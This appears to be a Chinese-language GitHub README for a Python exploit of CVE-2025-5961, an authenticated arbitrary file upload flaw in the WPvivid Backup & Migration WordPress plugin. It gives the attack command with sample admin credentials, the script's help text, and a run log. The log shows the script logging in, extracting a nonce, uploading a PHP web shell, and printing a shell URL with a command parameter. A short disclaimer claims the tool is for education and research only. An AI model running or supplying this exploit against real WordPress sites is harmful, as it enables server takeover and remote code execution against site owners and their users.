📈 此漏洞影响拥有超过 700,000+ 次安装 的插件
用于 WordPress 的 Migration, Backup, Staging – WPvivid Backup & Migration 插件因缺少对 wpvivid_upload_import_files 函数的文件类型验证,导致所有版本(包括 0.9.116)都存在 任意文件上传 漏洞。
这使得 经过身份验证的攻击者(管理员级别及以上) 能够将任意文件上传至服务器,从而可能实现远程代码执行。
本仓库包含一个针对 CVE-2025-5961 的利用脚本,使用 Python 编写,其功能包括:
python3 CVE-2025-5961.py -u http://target/wordpress -un admin -p password123
$ python3 CVE-2025-5961.py -h
usage: CVE-2025-5961.py [-h] -u URL -un USERNAME -p PASSWORD
CVE-2025-5961 Exploit by Khaled Alenazi (Nxploited)
options:
-h, --help 显示此帮助信息并退出
-u, --url URL 目标 WordPress URL
-un, --username USERNAME
管理员用户名
-p, --password PASSWORD
管理员密码
[+] 正在检查插件版本...
[+] 检测到插件版本: 0.9.116
[+] 目标存在漏洞,继续利用。
[+] 正在登录 http://target/wordpress...
[+] 登录成功。
[+] 正在获取 WPvivid 页面以提取 nonce...
[+] 提取的 nonce: 502d5dce0e
[+] 正在上传 shell...
[+] 利用成功!
[+] Shell URL: http://target/wordpress/wp-content/wpvividbackups/ImportandExport/shellnxploited.php?cmd=whoami
利用者: Khaled Alenazi (Nxploited) - https://github.com/Nxploited/
此脚本仅用于 教育和研究目的。
作者不对因使用本工具而导致的任何滥用或损害负责。
Khaled Alenazi (Nxploited)
🌐 GitHub